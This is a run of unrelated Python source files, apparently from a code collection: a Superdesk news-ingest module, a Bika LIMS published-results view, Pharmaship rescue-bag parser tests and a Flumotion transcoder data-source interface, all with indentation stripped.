expiry = item.get('expiry', item['versioncreated'] + delta)
if expiry.tzinfo:
return expiry > utcnow()
return False
try:
delta = timedelta(minutes=provider.get('content_expiry', app.config['INGEST_EXPIRY_MINUTES']))
return [item for item in items if is_not_expired(item)]
except Exception as ex:
raise ProviderError.providerFilterExpiredContentError(ex, provider)
def get_provider_rule_set(provider):
if provider.get('rule_set'):
return superdesk.get_resource_service('rule_sets').find_one(_id=provider['rule_set'], req=None)
def get_provider_routing_scheme(provider):
"""Returns the ingests provider's routing scheme configuration.
If provider has a routing scheme defined (i.e. scheme ID is not None), the
scheme is fetched from the database. If not, nothing is returned.
For all scheme rules that have a reference to a content filter defined,
that filter's configuration is fetched from the database as well and
embedded into the corresponding scheme rule.
:param dict provider: ingest provider configuration
:return: fetched provider's routing scheme configuration (if any)
:rtype: dict or None
"""
if not provider.get('routing_scheme'):
return None
schemes_service = superdesk.get_resource_service('routing_schemes')
filters_service = superdesk.get_resource_service('content_filters')
scheme = schemes_service.find_one(_id=provider['routing_scheme'], req=None)
# for those routing rules that have a content filter defined,
# get that filter from DB and embed it into the rule...
rules_filters = (
(rule, str(rule['filter']))
for rule in scheme['rules'] if rule.get('filter'))
for rule, filter_id in rules_filters:
content_filter = filters_service.find_one(_id=filter_id, req=None)
rule['filter'] = content_filter
return scheme
def get_task_ttl(provider):
update_schedule = provider.get('update_schedule', UPDATE_SCHEDULE_DEFAULT)
return update_schedule.get('minutes', 0) * 60 + update_schedule.get('hours', 0) * 3600
def get_is_idle(providor):
last_item = providor.get(LAST_ITEM_UPDATE)
idle_time = providor.get('idle_time', IDLE_TIME_DEFAULT)
if isinstance(idle_time['hours'], datetime):
idle_hours = 0
else:
idle_hours = idle_time['hours']
if isinstance(idle_time['minutes'], datetime):
idle_minutes = 0
else:
idle_minutes = idle_time['minutes']
# there is an update time and the idle time is none zero
if last_item and (idle_hours != 0 or idle_minutes != 0):
if utcnow() > last_item + timedelta(hours=idle_hours, minutes=idle_minutes):
return True
return False
def get_task_id(provider):
return 'update-ingest-{0}-{1}'.format(provider.get('name'), provider.get(superdesk.config.ID_FIELD))
def is_updatable(provider):
"""Test if given provider has service that can update it.
:param provider
"""
service = providers.get(provider.get('type'))
return hasattr(service, 'update')
class UpdateIngest(superdesk.Command):
"""Update ingest providers."""
option_list = (
superdesk.Option('--provider', '-p', dest='provider_type'),
)
def run(self, provider_type=None):
for provider in superdesk.get_resource_service('ingest_providers').get(req=None, lookup={}):
if (is_valid_type(provider, provider_type) and is_updatable(provider)
and is_scheduled(provider) and not is_closed(provider)):
kwargs = {
'provider': provider,
'rule_set': get_provider_rule_set(provider),
'routing_scheme': get_provider_routing_scheme(provider)
}
update_provider.apply_async(
expires=get_task_ttl(provider),
kwargs=kwargs)
@celery.task(soft_time_limit=1800, bind=True)
def update_provider(self, provider, rule_set=None, routing_scheme=None):
"""
Fetches items from ingest provider as per the configuration, ingests them into Superdesk and
updates the provider.
"""
if provider.get('type') == 'search':
return
if not is_updatable(provider):
return
lock_name = get_lock_id('ingest', provider['name'], provider[superdesk.config.ID_FIELD])
host_name = get_host_id(self)
if not lock(lock_name, host_name, expire=1800):
return
try:
update = {
LAST_UPDATED: utcnow()
}
for items in providers[provider.get('type')].update(provider):
ingest_items(items, provider, rule_set, routing_scheme)
stats.incr('ingest.ingested_items', len(items))
if items:
update[LAST_ITEM_UPDATE] = utcnow()
ingest_service = superdesk.get_resource_service('ingest_providers')
ingest_service.system_update(provider[superdesk.config.ID_FIELD], update, provider)
if LAST_ITEM_UPDATE not in update and get_is_idle(provider):
notify_and_add_activity(
ACTIVITY_EVENT,
'Provider {{name}} has gone strangely quiet. Last activity was on {{last}}',
resource='ingest_providers',
user_list=ingest_service._get_administrators(),
name=provider.get('name'),
last=provider[LAST_ITEM_UPDATE].replace(tzinfo=timezone.utc).astimezone(tz=None).strftime("%c"))
logger.info('Provider {0} updated'.format(provider[superdesk.config.ID_FIELD]))
# Only push a notification if there has been an update
if LAST_ITEM_UPDATE in update:
push_notification('ingest:update', provider_id=str(provider[superdesk.config.ID_FIELD]))
finally:
unlock(lock_name, host_name)
def process_anpa_category(item, provider):
try:
anpa_categories = superdesk.get_resource_service('vocabularies').find_one(req=None, _id='categories')
if anpa_categories:
for item_category in item['anpa_category']:
for anpa_category in anpa_categories['items']:
if anpa_category['is_active'] is True \
and item_category['qcode'].lower() == anpa_category['qcode'].lower():
item_category['name'] = anpa_category['name']
# make the case of the qcode match what we hold in our dictionary
item_category['qcode'] = anpa_category['qcode']
break
except Exception as ex:
raise ProviderError.anpaError(ex, provider)
def derive_category(item, provider):
"""
Assuming that the item has at least one itpc subject use the vocabulary map to derive an anpa category
:param item:
:return: An item with a category if possible
"""
try:
categories = []
subject_map = superdesk.get_resource_service('vocabularies').find_one(req=None, _id='iptc_category_map')
if subject_map:
for entry in (map_entry for map_entry in subject_map['items'] if map_entry['is_active']):
for subject in item.get('subject', []):
if subject['qcode'] == entry['subject']:
if not any(c['qcode'] == entry['category'] for c in categories):
categories.append({'qcode': entry['category']})
if len(categories):
item['anpa_category'] = categories
process_anpa_category(item, provider)
except Exception as ex:
logger.exception(ex)
def process_iptc_codes(item, provider):
"""
Ensures that the higher level IPTC codes are present by inserting them if missing, for example
if given 15039001 (Formula One) make sure that 15039000 (motor racing) and 15000000 (sport) are there as well
:param item: A story item
:return: A story item with possible expanded subjects
"""
try:
def iptc_already_exists(code):
for entry in item['subject']:
if 'qcode' in entry and code == entry['qcode']:
return True
return False
for subject in item['subject']:
if 'qcode' in subject and len(subject['qcode']) == 8:
top_qcode = subject['qcode'][:2] + '000000'
if not iptc_already_exists(top_qcode):
item['subject'].append({'qcode': top_qcode, 'name': subject_codes[top_qcode]})
mid_qcode = subject['qcode'][:5] + '000'
if not iptc_already_exists(mid_qcode):
item['subject'].append({'qcode': mid_qcode, 'name': subject_codes[mid_qcode]})
except Exception as ex:
raise ProviderError.iptcError(ex, provider)
def derive_subject(item):
"""
Assuming that the item has an anpa category try to derive a subject using the anpa category vocabulary
:param item:
:return:
"""
try:
category_map = superdesk.get_resource_service('vocabularies').find_one(req=None, _id='categories')
if category_map:
for cat in item['anpa_category']:
map_entry = next(
(code for code in category_map['items'] if code['qcode'] == cat['qcode'] and code['is_active']),
None)
if map_entry and 'subject' in map_entry:
item['subject'] = [
{'qcode': map_entry.get('subject'), 'name': subject_codes[map_entry.get('subject')]}]
except Exception as ex:
logger.exception(ex)
def apply_rule_set(item, provider, rule_set=None):
"""
Applies rules set on the item to be ingested into the system. If there's no rule set then the item will
be returned without any change.
:param item: Item to be ingested
:param provider: provider object from whom the item was received
:return: item
"""
try:
if rule_set is None and provider.get('rule_set') is not None:
rule_set = superdesk.get_resource_service('rule_sets').find_one(_id=provider['rule_set'], req=None)
if rule_set and 'body_html' in item:
body = item['body_html']
for rule in rule_set['rules']:
body = body.replace(rule['old'], rule['new'])
item['body_html'] = body
return item
except Exception as ex:
raise ProviderError.ruleError(ex, provider)
def ingest_items(items, provider, rule_set=None, routing_scheme=None):
all_items = filter_expired_items(provider, items)
items_dict = {doc[GUID_FIELD]: doc for doc in all_items}
items_in_package = []
failed_items = set()
for item in [doc for doc in all_items if doc.get(ITEM_TYPE) == CONTENT_TYPE.COMPOSITE]:
items_in_package = [ref['residRef'] for group in item.get('groups', [])
for ref in group.get('refs', []) if 'residRef' in ref]
for item in [doc for doc in all_items if doc.get(ITEM_TYPE) != CONTENT_TYPE.COMPOSITE]:
ingested = ingest_item(item, provider, rule_set,
routing_scheme=routing_scheme if not item[GUID_FIELD] in items_in_package else None)
if not ingested:
failed_items.add(item[GUID_FIELD])
for item in [doc for doc in all_items if doc.get(ITEM_TYPE) == CONTENT_TYPE.COMPOSITE]:
for ref in [ref for group in item.get('groups', [])
for ref in group.get('refs', []) if 'residRef' in ref]:
if ref['residRef'] in failed_items:
failed_items.add(item[GUID_FIELD])
continue
ref.setdefault('location', 'ingest')
itemRendition = items_dict.get(ref['residRef'], {}).get('renditions')
if itemRendition:
ref.setdefault('renditions', itemRendition)
ref[GUID_FIELD] = ref['residRef']
if items_dict.get(ref['residRef']):
ref['residRef'] = items_dict.get(ref['residRef'], {}).get(superdesk.config.ID_FIELD)
if item[GUID_FIELD] in failed_items:
continue
ingested = ingest_item(item, provider, rule_set, routing_scheme)
if not ingested:
failed_items.add(item[GUID_FIELD])
app.data._search_backend('ingest').bulk_insert('ingest', [item for item in all_items
if item[GUID_FIELD] not in failed_items])
if failed_items:
logger.error('Failed to ingest the following items: %s', failed_items)
return failed_items
def ingest_item(item, provider, rule_set=None, routing_scheme=None):
try:
item.setdefault(superdesk.config.ID_FIELD, generate_guid(type=GUID_NEWSML))
item[FAMILY_ID] = item[superdesk.config.ID_FIELD]
providers[provider.get('type')].provider = provider
item['ingest_provider'] = str(provider[superdesk.config.ID_FIELD])
item.setdefault('source', provider.get('source', ''))
set_default_state(item, STATE_INGESTED)
item['expiry'] = get_expiry_date(provider.get('content_expiry', app.config['INGEST_EXPIRY_MINUTES']),
item.get('versioncreated'))
if 'anpa_category' in item:
process_anpa_category(item, provider)
if 'subject' in item:
process_iptc_codes(item, provider)
if 'anpa_category' not in item:
derive_category(item, provider)
elif 'anpa_category' in item:
derive_subject(item)
apply_rule_set(item, provider, rule_set)
ingest_service = superdesk.get_resource_service('ingest')
if item.get('ingest_provider_sequence') is None:
ingest_service.set_ingest_provider_sequence(item, provider)
old_item = ingest_service.find_one(guid=item[GUID_FIELD], req=None)
rend = item.get('renditions', {})
if rend:
baseImageRend = rend.get('baseImage') or next(iter(rend.values()))
if baseImageRend:
href = providers[provider.get('type')].prepare_href(baseImageRend['href'])
update_renditions(item, href, old_item)
new_version = True
if old_item:
# In case we already have the item, preserve the _id
item[superdesk.config.ID_FIELD] = old_item[superdesk.config.ID_FIELD]
ingest_service.put_in_mongo(item[superdesk.config.ID_FIELD], item)
# if the feed is versioned and this is not a new version
if 'version' in item and 'version' in old_item and item.get('version') == old_item.get('version'):
new_version = False
else:
try:
ingest_service.post_in_mongo([item])
except HTTPException as e:
logger.error("Exception while persisting item in ingest collection", e)
if routing_scheme and new_version:
routed = ingest_service.find_one(_id=item[superdesk.config.ID_FIELD], req=None)
superdesk.get_resource_service('routing_schemes').apply_routing_scheme(routed, provider, routing_scheme)
except Exception as ex:
logger.exception(ex)
try:
superdesk.app.sentry.captureException()
except:
pass
return False
return True
def update_renditions(item, href, old_item):
"""
If the old_item has renditions uploaded in to media then the old rendition details are
assigned to the item, this avoids repeatedly downloading the same image and leaving the media entries orphaned.
If there is no old_item the original is downloaded and renditions are
generated.
:param item: parsed item from source
:param href: reference to original
:param old_item: the item that we have already injested, if it exists
:return: item with renditions
"""
inserted = []
try:
# If there is an existing set of renditions we keep those
if old_item:
media = old_item.get('renditions', {}).get('original', {}).get('media', {})
if media:
item['renditions'] = old_item['renditions']
item['mimetype'] = old_item.get('mimetype')
item['filemeta'] = old_item.get('filemeta')
return
content, filename, content_type = download_file_from_url(href)
file_type, ext = content_type.split('/')
metadata = process_file(content, file_type)
file_guid = app.media.put(content, filename, content_type, metadata)
inserted.append(file_guid)
rendition_spec = app.config.get('RENDITIONS', {}).get('picture', {})
renditions = generate_renditions(content, file_guid, inserted, file_type,
content_type, rendition_spec, url_for_media)
item['renditions'] = renditions
item['mimetype'] = content_type
item['filemeta'] = metadata
except Exception:
for file_id in inserted:
app.media.delete(file_id)
raise
superdesk.command('ingest:update', UpdateIngest())
|
rockfruit/bika.lims
|
bika/lims/browser/analysisrequest/published_results.py
|
# This file is part of Bika LIMS
#
# Copyright 2011-2016 by it's authors.
# Some rights reserved. See LICENSE.txt, AUTHORS.txt.
from AccessControl import getSecurityManager
from Products.CMFPlone.utils import safe_unicode
from bika.lims import bikaMessageFactory as _
from bika.lims.utils import t
from bika.lims.browser.bika_listing import BikaListingView
from bika.lims.content.analysisrequest import schema as AnalysisRequestSchema
from bika.lims.permissions import *
from bika.lims.utils import to_utf8
from bika.lims.workflow import doActionFor
from DateTime import DateTime
from Products.Archetypes import PloneMessageFactory as PMF
from Products.CMFCore.utils import getToolByName
import plone
class AnalysisRequestPublishedResults(BikaListingView):
""" View of published results
Prints the list of pdf files with each publication dates, the user
responsible of that publication, the emails of the addressees (and/or)
client contact names with the publication mode used (pdf, email, etc.)
"""
# I took IViewView away, because transitions selected in the edit-bar
# cause errors due to wrong context, when invoked from this view, and I
# don't know why.
# implements(IViewView)
def __init__(self, context, request):
super(AnalysisRequestPublishedResults, self).__init__(context, request)
self.catalog = "bika_catalog"
self.contentFilter = {'portal_type': 'ARReport',
'sort_order': 'reverse'}
self.context_actions = {}
self.show_select_column = True
self.show_workflow_action_buttons = False
self.form_id = 'published_results'
self.icon = self.portal_url + "/++resource++bika.lims.images/report_big.png"
self.title = self.context.translate(_("Published results"))
self.columns = {
'Title': {'title': _('File')},
'FileSize': {'title': _('Size')},
'Date': {'title': _('Date')},
'PublishedBy': {'title': _('Published By')},
'Recipients': {'title': _('Recipients')},
}
self.review_states = [
{'id': 'default',
'title': 'All',
'contentFilter': {},
'columns': ['Title',
'FileSize',
'Date',
'PublishedBy',
'Recipients']},
]
def __call__(self):
ar = self.context
workflow = getToolByName(ar, 'portal_workflow')
# If is a retracted AR, show the link to child AR and show a warn msg
if workflow.getInfoFor(ar, 'review_state') == 'invalid':
childar = hasattr(ar, 'getChildAnalysisRequest') \
and ar.getChildAnalysisRequest() or None
childid = childar and childar.getRequestID() or None
message = _('This Analysis Request has been withdrawn and is '
'shown for trace-ability purposes only. Retest: '
'${retest_child_id}.',
mapping={'retest_child_id': safe_unicode(childid) or ''})
self.context.plone_utils.addPortalMessage(
self.context.translate(message), 'warning')
# If is an AR automatically generated due to a Retraction, show it's
# parent AR information
if hasattr(ar, 'getParentAnalysisRequest') \
and ar.getParentAnalysisRequest():
par = ar.getParentAnalysisRequest()
message = _('This Analysis Request has been '
'generated automatically due to '
'the retraction of the Analysis '
'Request ${retracted_request_id}.',
mapping={'retracted_request_id': par.getRequestID()})
self.context.plone_utils.addPortalMessage(
self.context.translate(message), 'info')
template = BikaListingView.__call__(self)
return template
def contentsMethod(self, contentFilter):
"""
ARReport objects associated to the current Analysis request.
If the user is not a Manager or LabManager or Client, no items are
displayed.
"""
allowedroles = ['Manager', 'LabManager', 'Client', 'LabClerk']
pm = getToolByName(self.context, "portal_membership")
member = pm.getAuthenticatedMember()
roles = member.getRoles()
allowed = [a for a in allowedroles if a in roles]
return self.context.objectValues('ARReport') if allowed else []
def folderitem(self, obj, item, index):
obj_url = obj.absolute_url()
pdf = obj.getPdf()
filesize = 0
title = _('Download')
anchor = "<a href='%s/at_download/Pdf'>%s</a>" % \
(obj_url, _("Download"))
try:
filesize = pdf.get_size()
filesize = filesize / 1024 if filesize > 0 else 0
except:
# POSKeyError: 'No blob file'
# Show the record, but not the link
title = _('Not available')
anchor = title
item['Title'] = title
item['FileSize'] = '%sKb' % filesize
fmt_date = self.ulocalized_time(obj.created(), long_format=1)
item['Date'] = fmt_date
item['PublishedBy'] = self.user_fullname(obj.Creator())
recip = []
for recipient in obj.getRecipients():
email = recipient['EmailAddress']
val = recipient['Fullname']
if email:
val = "<a href='mailto:%s'>%s</a>" % (email, val)
recip.append(val)
item['replace']['Recipients'] = ', '.join(recip)
item['replace']['Title'] = anchor
return item
|
tuxite/pharmaship
|
pharmaship/tests/inventory/test_parsers_rescue_bag.py
|
# -*- coding: utf-8; -*-
"""Test suite for `parsers.rescue_bag` subpackage."""
import json
from pathlib import Path
from django.test import TestCase
from django.core.management import call_command
from django.conf import settings
from django.db.models.fields.files import ImageFieldFile
from cerberus import Validator, TypeDefinition
from pharmaship.core.utils import log
from pharmaship.gui.view import GlobalParameters
from pharmaship.inventory import models
from pharmaship.inventory.parsers import rescue_bag
class ParserMethodTestCase(TestCase):
"""Tests for `inventory.parsers.rescue_bag` methods."""
def setUp(self): # noqa: D102
self.assets = Path(settings.BASE_DIR) / "tests/inventory/assets"
# call_command("loaddata", self.assets / "test.dump.yaml")
call_command(
"loaddata",
self.assets / "parsers" / "rescue_bag.yaml"
)
self.params = GlobalParameters()
def test_get_required(self):
output = rescue_bag.get_required(self.params)
schema_path = settings.VALIDATOR_PATH.joinpath(
"parsers",
"rescue_bag",
"get_required.json"
)
schema = json.loads(schema_path.read_text())
validator = Validator(schema)
result = validator.validate(output)
if not result:
log.error(validator.errors)
log.debug(output)
self.assertTrue(result)
def test_create_molecule(self):
required = rescue_bag.get_required(self.params)
molecule = models.Molecule.objects.get(id=3)
output = rescue_bag.create_molecule(molecule, required["molecules"])
image_field = TypeDefinition(
name='image_field',
included_types=(ImageFieldFile,),
excluded_types=()
)
Validator.types_mapping['image_field'] = image_field
schema_path = settings.VALIDATOR_PATH.joinpath(
"parsers",
"rescue_bag",
"single_item.json"
)
schema = json.loads(schema_path.read_text())
validator = Validator(schema)
result = validator.validate(output)
if not result:
log.error(validator.errors)
log.debug(output)
self.assertTrue(result)
def test_create_equipment(self):
required = rescue_bag.get_required(self.params)
equipment = models.Equipment.objects.get(id=2)
output = rescue_bag.create_equipment(equipment, required["equipments"])
image_field = TypeDefinition(
name='image_field',
included_types=(ImageFieldFile,),
excluded_types=()
)
Validator.types_mapping['image_field'] = image_field
schema_path = settings.VALIDATOR_PATH.joinpath(
"parsers",
"rescue_bag",
"single_item.json"
)
schema = json.loads(schema_path.read_text())
validator = Validator(schema)
result = validator.validate(output)
if not result:
log.error(validator.errors)
log.debug(output)
self.assertTrue(result)
def test_create_molecules(self):
required = rescue_bag.get_required(self.params)
output = rescue_bag.create_molecules(
required["molecules"].keys(),
required["molecules"]
)
image_field = TypeDefinition(
name='image_field',
included_types=(ImageFieldFile,),
excluded_types=()
)
Validator.types_mapping['image_field'] = image_field
schema_path = settings.VALIDATOR_PATH.joinpath(
"parsers",
"rescue_bag",
"single_item.json"
)
schema = json.loads(schema_path.read_text())
validator = Validator(schema)
for item in output:
result = validator.validate(output[item])
if not result:
log.error(validator.errors)
log.debug(output[item])
self.assertTrue(result)
schema = {
"data": {
"type": "dict",
"keysrules": {
"type": "integer"
}
}
}
validator = Validator(schema)
self.assertTrue(validator.validate({"data": output}))
def test_create_equipments(self):
required = rescue_bag.get_required(self.params)
output = rescue_bag.create_equipments(
required["equipments"].keys(),
required["equipments"]
)
image_field = TypeDefinition(
name='image_field',
included_types=(ImageFieldFile,),
excluded_types=()
)
Validator.types_mapping['image_field'] = image_field
schema_path = settings.VALIDATOR_PATH.joinpath(
"parsers",
"rescue_bag",
"single_item.json"
)
schema = json.loads(schema_path.read_text())
validator = Validator(schema)
for item in output:
result = validator.validate(output[item])
if not result:
log.error(validator.errors)
log.debug(output[item])
self.assertTrue(result)
schema = {
"data": {
"type": "dict",
"keysrules": {
"type": "integer"
}
}
}
validator = Validator(schema)
self.assertTrue(validator.validate({"data": output}))
def test_get_transactions(self):
schema_path = settings.VALIDATOR_PATH.joinpath(
"parsers",
"rescue_bag",
"get_transactions.json"
)
schema = json.loads(schema_path.read_text())
validator = Validator(schema)
# Test for medicines
content_type = self.params.content_types["medicine"]
items = models.Medicine.objects.filter(used=False).values_list("id", flat=True)
output = rescue_bag.get_transactions(content_type, items)
result = validator.validate({"data": output})
if not result:
log.error(validator.errors)
log.debug(output)
self.assertTrue(result)
# Test for articles
content_type = self.params.content_types["article"]
items = models.Article.objects.filter(used=False).values_list("id", flat=True)
output = rescue_bag.get_transactions(content_type, items)
result = validator.validate({"data": output})
if not result:
log.error(validator.errors)
log.debug(output)
self.assertTrue(result)
def test_get_medicines(self):
required = rescue_bag.get_required(self.params)
output = rescue_bag.get_medicines(
self.params,
required["molecules"],
[100,]
)
image_field = TypeDefinition(
name='image_field',
included_types=(ImageFieldFile,),
excluded_types=()
)
Validator.types_mapping['image_field'] = image_field
schema_path = settings.VALIDATOR_PATH.joinpath(
"parsers",
"rescue_bag",
"single_item.json"
)
schema = json.loads(schema_path.read_text())
validator = Validator(schema)
for item in output:
result = validator.validate(output[item])
if not result:
log.error(validator.errors)
log.debug(output[item])
self.assertTrue(result)
schema = {
"data": {
"type": "dict",
"keysrules": {
"type": "integer"
}
}
}
validator = Validator(schema)
self.assertTrue(validator.validate({"data": output}))
def test_get_articles(self):
required = rescue_bag.get_required(self.params)
output = rescue_bag.get_articles(
self.params,
required["equipments"],
[100,]
)
image_field = TypeDefinition(
name='image_field',
included_types=(ImageFieldFile,),
excluded_types=()
)
Validator.types_mapping['image_field'] = image_field
schema_path = settings.VALIDATOR_PATH.joinpath(
"parsers",
"rescue_bag",
"single_item.json"
)
schema = json.loads(schema_path.read_text())
validator = Validator(schema)
for item in output:
result = validator.validate(output[item])
if not result:
log.error(validator.errors)
log.debug(output[item])
self.assertTrue(result)
schema = {
"data": {
"type": "dict",
"keysrules": {
"type": "integer"
}
}
}
validator = Validator(schema)
self.assertTrue(validator.validate({"data": output}))
def test_merge_bags(self):
required = rescue_bag.get_required(self.params)
equipments = rescue_bag.get_articles(
self.params,
required["equipments"],
[110, 111]
)
molecules = rescue_bag.get_medicines(
self.params,
required["molecules"],
[110, 111]
)
bags = models.RescueBag.objects.all()
output = rescue_bag.merge_bags(bags, molecules, equipments)
image_field = TypeDefinition(
name='image_field',
included_types=(ImageFieldFile,),
excluded_types=()
)
Validator.types_mapping['image_field'] = image_field
schema_path = settings.VALIDATOR_PATH.joinpath(
"parsers",
"rescue_bag",
"merged_bags.json"
)
schema = json.loads(schema_path.read_text())
validator = Validator(schema)
result = validator.validate({"data": output})
if not result:
log.error(validator.errors)
log.debug(output)
self.assertTrue(result)
def test_parser(self):
output = rescue_bag.parser(self.params)
image_field = TypeDefinition(
name='image_field',
included_types=(ImageFieldFile,),
excluded_types=()
)
Validator.types_mapping['image_field'] = image_field
schema_path = settings.VALIDATOR_PATH.joinpath(
"parsers",
"rescue_bag",
"rescue_bag.json"
)
schema = json.loads(schema_path.read_text())
validator = Validator(schema)
result = validator.validate({"data": output})
if not result:
log.error(validator.errors)
log.debug(output)
self.assertTrue(result)
|
osiloke/Flumotion-Transcoder
|
flumotion/transcoder/admin/datasource/datasource.py
|
# vi:si:et:sw=4:sts=4:ts=4
# Flumotion - a streaming media server
# Copyright (C) 2004,2005,2006,2007,2008,2009 Fluendo, S.L.
# Copyright (C) 2010,2011 Flumotion Services, S.A.
# All rights reserved.
#
# This file may be distributed and/or modified under the terms of
# the GNU Lesser General Public License version 2.1 as published by
# the Free Software Foundation.
# This file is distributed without any warranty; without even the implied
# warranty of merchantability or fitness for a particular purpose.
# See "LICENSE.LGPL" in the source distribution for more information.
#
# Headers in this file shall remain intact.
from zope.interface import Interface
from flumotion.transcoder import errors
class DataSourceError(errors.TranscoderError):
def __init__(self, *args, **kwargs):
errors.TranscoderError.__init__(self, *args, **kwargs)
class InitializationError(DataSourceError):
def __init__(self, *args, **kwargs):
DataSourceError.__init__(self, *args, **kwargs)
class StoringError(DataSourceError):
def __init__(self, *args, **kwargs):
DataSourceError.__init__(self, *args, **kwargs)
class DeletionError(DataSourceError):
def __init__(self, *args, **kwargs):
DataSourceError.__init__(self, *args, **kwargs)
class ResetError(DataSourceError):
def __init__(self, *args, **kwargs):
DataSourceError.__init__(self, *args, **kwargs)
class RetrievalError(DataSourceError):
def __init__(self, *args, **kwargs):
DataSourceError.__init__(self, *args, **kwargs)
class DataNotFoundError(RetrievalError):
def __init__(self, *args, **kwargs):
RetrievalError.__init__(self, *args, **kwargs)
class ReadOnlyDataError(StoringError):
def __init__(self, *args, **kwargs):
StoringError.__init__(self, *args, **kwargs)
class DuplicatedDataError(StoringError):
def __init__(self, *args, **kwargs):
StoringError.__init__(self, *args, **kwargs)
class DataDependencyError(StoringError):
def __init__(self, *args, **kwargs):
StoringError.__init__(self, *args, **kwargs)
class IDataSource(Interface):
"""
The data source allow the retrieval, creation, insertion and deletion
of "container" objects in an abstract source.
The given container are unspecified, apart for there fields,
the equality operator, and an identifier field that uniquely
and persistently identify a "record" and that is None when not stored.
The equality operator compare if the objects represent the same
element in the source, not that they have the same field values.
Two new element that has not been stored in the source are never equal.
If an element is retrieved and modified more than one time before
storing them, all modification but the last stored one are lost
without warning. THERE IS NO CONCURENT MODIFICATION PROTECTION.
"""
def initialize(self):
"""
Return a deferred.
Initialize the data source.
"""
def store(self, *data):
"""
Returns a deferred.
Store all the specified container objectes.
The objects must have been created by the store.
All the objecte are stored atomically if the
store support it.
"""
def reset(self, *data):
"""
Returns a deferred.
Reset the values of the specified container objects
to there original value from the data source.
If a specified container was never stored,
its values are not changed.
"""
def delete(self, *data):
"""
Return a deferred.
Delete all the specified container objectes.
The objects must have been created by the store.
All the objecte are deleted atomically if the
store support it.
Deletion is not an operation that could be
reversed by calling reset.
"""
class IReportsSource(IDataSource):
"""
The reports source holds the results of transcoding activities.
"""
def newTranscodeReport(self):
"""
Createas a new transcoding report container object.
"""
class IInformationSource(IDataSource):
"""
The information source holds all the information that are not held
by the reports source. This includes customers, profiles,
notifications, etc.
"""
def waitReady(self, timeout=None):
"""
Returns a deferred that is called when the source
is ready to provide data, if the source fail to initialize
or if the specified timeout is reached.
"""
def retrieveDefaults(self):
"""
Returns a deferred.
The result on success is a "container" object
with the following fields:
outputMediaTemplate (str) can be None
outputThumbTemplate (str) can be None
linkFileTemplate (str) can be None
configFileTemplate (str) can be None
reportFileTemplate (str) can be None
accessForceGroup (str) can be None
accessForceUser (str) can be None
accessForceDirMode (int) can be None
accessForceFileMode (int) can be None
monitoringPeriod (int) can be None:
Gives the default period used to monitor the filesystem.
processPriority (int) can be None:
Gives the default process priority for the transcoding job
transcodingPriority (int) can be None:
Gives the default scheduler priority of the transcoding jobs.
transcodingTimeout (int) can be None:
Gives the default timeout of the transcoding jobs.
postprocessTimeout (int) can be None:
Gives the default timeout of the post-processing.
preprocessTimeout (int) can be None:
Gives the default timeout of the pre-processing.
mailSubjectTemplate (str) can be None:
Gives the default template for the mail notifications subject.
mailBodyTemplate (str) can be None:
Gives the default template for the mail notifications body.
mailTimeout (int) can be None:
Gives the default timeout for mail notifications.
mailRetryCount (int) can be None:
Gives the default retry count for mail notifications.
mailRetrySleep (int) can be None:
Gives the default time between retry for mail notifications.
HTTPRequestTimeout (int) can be None:
Gives the default timeout for HTTP request notifications.
HTTPRequestRetryCount (int) can be None:
Gives the default retry count for HTTP request notifications.
HTTPRequestRetrySleep (int) can be None:
Gives the default time between retry
for HTTP request notifications.
sqlTimeout (int) can be None:
Gives the default timeout for sql notifications.
sqlRetryCount (int) can be None:
Gives the default retry count for sql notifications.
sqlRetrySleep (int) can be None:
Gives the default time between retry for sql notifications.
"""
def retrieveCustomers(self):
"""
Returns a deferred.
The result on success is a list of "container" objects
with the following fields:
name (str) : The customer name used by the transcoder.
subdir (str) can be None : The sub-directory where the transcoder
root is. If not specified, it will be deduced from the customer name.
Overriding fields:
inputDir (str) can be None
outputDir (str) can be None
failedDir (str) can be None
doneDir (str) can be None
linkDir (str) can be None
workDir (str) can be None
configDir (str) can be None
tempRepDir (str) can be None
failedRepDir (str) can be None
doneRepDir (str) can be None
outputMediaTemplate (str)
outputThumbTemplate (str)
linkFileTemplate (str)
configFileTemplate (str)
reportFileTemplate (str)
linkTemplate (str) can be None
linkURLPrefix (str) can be None
enablePostprocessing (bool) can be None
enablePreprocessing (bool) can be None
enableLinkFiles (bool) can be None
customerPriority (int) can be None
transcodingPriority (int) can be None
processPriority (int) can be None
preprocessCommand (str) can be None
postprocessCommand (str) can be None
preprocesstimeout (int) can be None
postprocessTimeout (int) can be None
transcodingTimeout (int) can be None
monitoringPeriod (int) can be None
accessForceGroup (str) can be None
accessForceUser (str) can be None
accessForceDirMode (int) can be None
accessForceFileMode (int) can be None
"""
def retrieveCustomerInfo(self, custData):
"""
Returns a deferred.
The result on success is a "container" objects
with the following READ ONLY fields:
name (str) can be None
contact (str) can be None
addresses (str[]) maximum size of 3, can be empty
phone (str) can be None
email (str) can be None
"""
def retrieveProfiles(self, custData):
"""
Returns a deferred.
The result on success is a list of "container" objects
with the following fields:
name (str)
subdir (str) can be None
Overriding fields:
inputDir (str) can be None
outputDir (str) can be None
failedDir (str) can be None
doneDir (str) can be None
linkDir (str) can be None
workDir (str) can be None
configDir (str) can be None
tempRepDir (str) can be None
failedRepDir (str) can be None
doneRepDir (str) can be None
outputMediaTemplate (str) can be None
outputThumbTemplate (str) can be None
linkFileTemplate (str) can be None
configFileTemplate (str) can be None
reportFileTemplate (str) can be None
linkTemplate (str) can be None
linkURLPrefix (str) can be None
enablePostprocessing (bool) can be None
enablePreprocessing (bool) can be None
enableLinkFiles (bool) can be None
transcodingPriority (int) can be None
processPriority (int) can be None
preprocessCommand (str) can be None
postprocessCommand (str) can be None
preprocesstimeout (int) can be None
postprocessTimeout (int) can be None
transcodingTimeout (int) can be None
monitoringPeriod (int) can be None
"""
def retrieveTargets(self, profData):
"""
Returns a deferred.
The result on success is a list of "container" objects
with the following fields:
name (str)
extension (str)
subdir (str) can be None
Overriding fields:
linkTemplate (str) can be None
linkURLPrefix (str) can be None
outputDir (str) can be None
linkDir (str) can be None
workDir (str) can be None
outputFileTemplate (str) can be None
linkFileTemplate (str) can be None
enablePostprocessing (bool) can be None
enableLinkFiles (bool) can be None
postprocessCommand (str) can be None
postprocessTimeout (int) can be None
"""
def retrieveTargetConfig(self, targData):
"""
Returns a deferred.
The result on success is a "container" objects
that depend of the target type.
For all:
type (TargetTypeEnum)
For an Audio and Audio/Video targets, it has the following fields:
muxer (str)
audioEncoder (str)
audioResampler (str)
audioRate (str)
audioChannels (str)
For a video and Audio/Video targets, it has the following fields:
muxer (str)
videoEncoder (str)
videoWidth (int)
videoHeight (int)
videoMaxWidth (int)
videoMaxHeight (int)
